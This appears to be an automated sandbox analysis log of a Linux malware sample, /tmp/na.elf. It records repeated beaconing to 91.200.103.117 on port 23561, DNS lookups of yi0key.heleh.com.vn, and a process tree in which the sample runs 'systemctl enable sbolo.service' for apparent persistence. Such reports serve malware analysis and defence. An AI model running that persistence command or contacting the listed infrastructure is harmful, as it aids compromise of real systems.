                                          Oct 7, 2024 16:34:52.244847059 CEST235614165491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:52.245122910 CEST4165423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:52.250047922 CEST235614165491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:53.259727955 CEST4165623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:53.264549971 CEST235614165691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:53.264614105 CEST4165623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:53.266633034 CEST4165623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:53.271388054 CEST235614165691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:55.066499949 CEST235614165691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:34:55.066673994 CEST4165623561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:34:55.071543932 CEST235614165691.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:00.087125063 CEST4165823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:00.091969013 CEST235614165891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:00.092051983 CEST4165823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:00.092749119 CEST4165823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:00.097583055 CEST235614165891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:01.789494991 CEST235614165891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:01.789719105 CEST4165823561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:01.794609070 CEST235614165891.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:04.801256895 CEST4166023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:04.808361053 CEST235614166091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:04.808434010 CEST4166023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:04.809190989 CEST4166023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:04.814340115 CEST235614166091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:06.481534958 CEST235614166091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:06.481676102 CEST4166023561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:06.487608910 CEST235614166091.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:13.492958069 CEST4166223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:13.497859955 CEST235614166291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:13.497915983 CEST4166223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:13.498789072 CEST4166223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:13.504443884 CEST235614166291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:15.260978937 CEST235614166291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:15.261162043 CEST4166223561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:15.266979933 CEST235614166291.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:18.272593975 CEST4166423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:18.278896093 CEST235614166491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:18.278961897 CEST4166423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:18.279983044 CEST4166423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:18.284868956 CEST235614166491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:19.943147898 CEST235614166491.200.103.117192.168.2.15
                                          Oct 7, 2024 16:35:19.943312883 CEST4166423561192.168.2.1591.200.103.117
                                          Oct 7, 2024 16:35:19.948471069 CEST235614166491.200.103.117192.168.2.15
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 7, 2024 16:31:45.132044077 CEST5232053192.168.2.158.8.8.8
                                          Oct 7, 2024 16:31:45.139492989 CEST53523208.8.8.8192.168.2.15
                                          Oct 7, 2024 16:31:52.819508076 CEST5478053192.168.2.158.8.8.8
                                          Oct 7, 2024 16:31:53.028981924 CEST53547808.8.8.8192.168.2.15
                                          Oct 7, 2024 16:32:00.691991091 CEST4422053192.168.2.158.8.8.8
                                          Oct 7, 2024 16:32:00.699559927 CEST53442208.8.8.8192.168.2.15
                                          Oct 7, 2024 16:32:10.316546917 CEST5766853192.168.2.158.8.8.8
                                          Oct 7, 2024 16:32:10.323684931 CEST53576688.8.8.8192.168.2.15
                                          Oct 7, 2024 16:32:15.974654913 CEST4193753192.168.2.158.8.8.8
                                          Oct 7, 2024 16:32:15.981636047 CEST53419378.8.8.8192.168.2.15
                                          Oct 7, 2024 16:32:24.596925020 CEST4419053192.168.2.158.8.8.8
                                          Oct 7, 2024 16:32:24.604088068 CEST53441908.8.8.8192.168.2.15
                                          Oct 7, 2024 16:32:31.278543949 CEST5697853192.168.2.158.8.8.8
                                          Oct 7, 2024 16:32:31.286689043 CEST53569788.8.8.8192.168.2.15
                                          Oct 7, 2024 16:32:42.933284044 CEST4857153192.168.2.158.8.8.8
                                          Oct 7, 2024 16:32:42.940320969 CEST53485718.8.8.8192.168.2.15
                                          Oct 7, 2024 16:32:50.876192093 CEST4297353192.168.2.158.8.8.8
                                          Oct 7, 2024 16:32:50.883510113 CEST53429738.8.8.8192.168.2.15
                                          Oct 7, 2024 16:32:59.752882004 CEST4487453192.168.2.158.8.8.8
                                          Oct 7, 2024 16:32:59.880291939 CEST53448748.8.8.8192.168.2.15
                                          Oct 7, 2024 16:33:02.537036896 CEST4901753192.168.2.158.8.8.8
                                          Oct 7, 2024 16:33:02.544117928 CEST53490178.8.8.8192.168.2.15
                                          Oct 7, 2024 16:33:12.179807901 CEST3859453192.168.2.158.8.8.8
                                          Oct 7, 2024 16:33:12.187648058 CEST53385948.8.8.8192.168.2.15
                                          Oct 7, 2024 16:33:16.803380013 CEST5564153192.168.2.158.8.8.8
                                          Oct 7, 2024 16:33:16.810549974 CEST53556418.8.8.8192.168.2.15
                                          Oct 7, 2024 16:33:27.427424908 CEST4575153192.168.2.158.8.8.8
                                          Oct 7, 2024 16:33:27.437187910 CEST53457518.8.8.8192.168.2.15
                                          Oct 7, 2024 16:33:39.072458029 CEST4241553192.168.2.158.8.8.8
                                          Oct 7, 2024 16:33:39.079920053 CEST53424158.8.8.8192.168.2.15
                                          Oct 7, 2024 16:33:50.725521088 CEST3795653192.168.2.158.8.8.8
                                          Oct 7, 2024 16:33:50.733082056 CEST53379568.8.8.8192.168.2.15
                                          Oct 7, 2024 16:34:02.349206924 CEST5342753192.168.2.158.8.8.8
                                          Oct 7, 2024 16:34:02.362937927 CEST53534278.8.8.8192.168.2.15
                                          Oct 7, 2024 16:34:06.636332035 CEST3817253192.168.2.158.8.8.8
                                          Oct 7, 2024 16:34:06.654851913 CEST53381728.8.8.8192.168.2.15
                                          Oct 7, 2024 16:34:11.324486017 CEST4813453192.168.2.158.8.8.8
                                          Oct 7, 2024 16:34:11.331882954 CEST53481348.8.8.8192.168.2.15
                                          Oct 7, 2024 16:34:16.843997002 CEST5351253192.168.2.158.8.8.8
                                          Oct 7, 2024 16:34:16.851047039 CEST53535128.8.8.8192.168.2.15
                                          Oct 7, 2024 16:34:27.010569096 CEST4763853192.168.2.151.1.1.1
                                          Oct 7, 2024 16:34:27.010659933 CEST4659253192.168.2.151.1.1.1
                                          Oct 7, 2024 16:34:27.017812014 CEST53465921.1.1.1192.168.2.15
                                          Oct 7, 2024 16:34:27.032597065 CEST53476381.1.1.1192.168.2.15
                                          Oct 7, 2024 16:34:27.886390924 CEST5052353192.168.2.158.8.8.8
                                          Oct 7, 2024 16:34:27.893830061 CEST53505238.8.8.8192.168.2.15
                                          Oct 7, 2024 16:34:35.940676928 CEST5851953192.168.2.158.8.8.8
                                          Oct 7, 2024 16:34:35.950792074 CEST53585198.8.8.8192.168.2.15
                                          Oct 7, 2024 16:34:41.740803957 CEST3630153192.168.2.158.8.8.8
                                          Oct 7, 2024 16:34:41.751394987 CEST53363018.8.8.8192.168.2.15
                                          Oct 7, 2024 16:34:50.486962080 CEST4952753192.168.2.158.8.8.8
                                          Oct 7, 2024 16:34:50.498312950 CEST53495278.8.8.8192.168.2.15
                                          Oct 7, 2024 16:34:53.249746084 CEST5558353192.168.2.158.8.8.8
                                          Oct 7, 2024 16:34:53.257376909 CEST53555838.8.8.8192.168.2.15
                                          Oct 7, 2024 16:35:00.069247007 CEST5107053192.168.2.158.8.8.8
                                          Oct 7, 2024 16:35:00.086395979 CEST53510708.8.8.8192.168.2.15
                                          Oct 7, 2024 16:35:04.791538954 CEST5582653192.168.2.158.8.8.8
                                          Oct 7, 2024 16:35:04.800574064 CEST53558268.8.8.8192.168.2.15
                                          Oct 7, 2024 16:35:13.485408068 CEST4026053192.168.2.158.8.8.8
                                          Oct 7, 2024 16:35:13.492445946 CEST53402608.8.8.8192.168.2.15
                                          Oct 7, 2024 16:35:18.264650106 CEST6015653192.168.2.158.8.8.8
                                          Oct 7, 2024 16:35:18.272126913 CEST53601568.8.8.8192.168.2.15
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 7, 2024 16:31:45.132044077 CEST192.168.2.158.8.8.80x3ff9Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:31:52.819508076 CEST192.168.2.158.8.8.80x2608Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:00.691991091 CEST192.168.2.158.8.8.80xa20aStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:10.316546917 CEST192.168.2.158.8.8.80x7773Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:15.974654913 CEST192.168.2.158.8.8.80x7ebeStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:24.596925020 CEST192.168.2.158.8.8.80xefc8Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:31.278543949 CEST192.168.2.158.8.8.80xc94Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:42.933284044 CEST192.168.2.158.8.8.80xeb08Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:50.876192093 CEST192.168.2.158.8.8.80x11bfStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:59.752882004 CEST192.168.2.158.8.8.80xe3f5Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:02.537036896 CEST192.168.2.158.8.8.80x4981Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:12.179807901 CEST192.168.2.158.8.8.80x4b27Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:16.803380013 CEST192.168.2.158.8.8.80x1169Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:27.427424908 CEST192.168.2.158.8.8.80x1df5Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:39.072458029 CEST192.168.2.158.8.8.80x77ccStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:50.725521088 CEST192.168.2.158.8.8.80x8a17Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:02.349206924 CEST192.168.2.158.8.8.80x7e02Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:06.636332035 CEST192.168.2.158.8.8.80x46a8Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:11.324486017 CEST192.168.2.158.8.8.80xc6bbStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:16.843997002 CEST192.168.2.158.8.8.80x10d1Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:27.010569096 CEST192.168.2.151.1.1.10x19feStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:27.010659933 CEST192.168.2.151.1.1.10x25d1Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                          Oct 7, 2024 16:34:27.886390924 CEST192.168.2.158.8.8.80x51Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:35.940676928 CEST192.168.2.158.8.8.80x6e28Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:41.740803957 CEST192.168.2.158.8.8.80xa283Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:50.486962080 CEST192.168.2.158.8.8.80x10e4Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:53.249746084 CEST192.168.2.158.8.8.80xf4c0Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:35:00.069247007 CEST192.168.2.158.8.8.80xdeddStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:35:04.791538954 CEST192.168.2.158.8.8.80xb232Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:35:13.485408068 CEST192.168.2.158.8.8.80x82faStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:35:18.264650106 CEST192.168.2.158.8.8.80xafc6Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 7, 2024 16:31:45.139492989 CEST8.8.8.8192.168.2.150x3ff9No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:31:53.028981924 CEST8.8.8.8192.168.2.150x2608No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:00.699559927 CEST8.8.8.8192.168.2.150xa20aNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:10.323684931 CEST8.8.8.8192.168.2.150x7773No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:15.981636047 CEST8.8.8.8192.168.2.150x7ebeNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:24.604088068 CEST8.8.8.8192.168.2.150xefc8No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:31.286689043 CEST8.8.8.8192.168.2.150xc94No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:42.940320969 CEST8.8.8.8192.168.2.150xeb08No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:50.883510113 CEST8.8.8.8192.168.2.150x11bfNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:32:59.880291939 CEST8.8.8.8192.168.2.150xe3f5No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:02.544117928 CEST8.8.8.8192.168.2.150x4981No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:12.187648058 CEST8.8.8.8192.168.2.150x4b27No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:16.810549974 CEST8.8.8.8192.168.2.150x1169No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:27.437187910 CEST8.8.8.8192.168.2.150x1df5No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:39.079920053 CEST8.8.8.8192.168.2.150x77ccNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:33:50.733082056 CEST8.8.8.8192.168.2.150x8a17No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:02.362937927 CEST8.8.8.8192.168.2.150x7e02No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:06.654851913 CEST8.8.8.8192.168.2.150x46a8No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:11.331882954 CEST8.8.8.8192.168.2.150xc6bbNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:16.851047039 CEST8.8.8.8192.168.2.150x10d1No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:27.032597065 CEST1.1.1.1192.168.2.150x19feNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:27.032597065 CEST1.1.1.1192.168.2.150x19feNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:27.893830061 CEST8.8.8.8192.168.2.150x51No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:35.950792074 CEST8.8.8.8192.168.2.150x6e28No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:41.751394987 CEST8.8.8.8192.168.2.150xa283No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:50.498312950 CEST8.8.8.8192.168.2.150x10e4No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:34:53.257376909 CEST8.8.8.8192.168.2.150xf4c0No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:35:00.086395979 CEST8.8.8.8192.168.2.150xdeddNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:35:04.800574064 CEST8.8.8.8192.168.2.150xb232No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:35:13.492445946 CEST8.8.8.8192.168.2.150x82faNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                          Oct 7, 2024 16:35:18.272126913 CEST8.8.8.8192.168.2.150xafc6No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false

                                          System Behavior

                                          Start time (UTC):14:31:44
                                          Start date (UTC):07/10/2024
                                          Path:/tmp/na.elf
                                          Arguments:/tmp/na.elf
                                          File size:4139976 bytes
                                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                          Start time (UTC):14:31:44
                                          Start date (UTC):07/10/2024
                                          Path:/tmp/na.elf
                                          Arguments:-
                                          File size:4139976 bytes
                                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                          Start time (UTC):14:31:44
                                          Start date (UTC):07/10/2024
                                          Path:/tmp/na.elf
                                          Arguments:-
                                          File size:4139976 bytes
                                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                          Start time (UTC):14:31:44
                                          Start date (UTC):07/10/2024
                                          Path:/bin/sh
                                          Arguments:sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):14:31:44
                                          Start date (UTC):07/10/2024
                                          Path:/bin/sh
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):14:31:44
                                          Start date (UTC):07/10/2024
                                          Path:/usr/bin/systemctl
                                          Arguments:systemctl enable sbolo.service
                                          File size:996584 bytes
                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                          Start time (UTC):14:31:44
                                          Start date (UTC):07/10/2024
                                          Path:/tmp/na.elf
                                          Arguments:-
                                          File size:4139976 bytes
                                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                          Start time (UTC):14:31:44
                                          Start date (UTC):07/10/2024
                                          Path:/usr/lib/systemd/systemd
                                          Arguments:-
                                          File size:1620224 bytes
                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                          Start time (UTC):14:31:44
                                          Start date (UTC):07/10/2024
                                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                          File size:22760 bytes
                                          MD5 hash:3633b075f40283ec938a2a6a89671b0e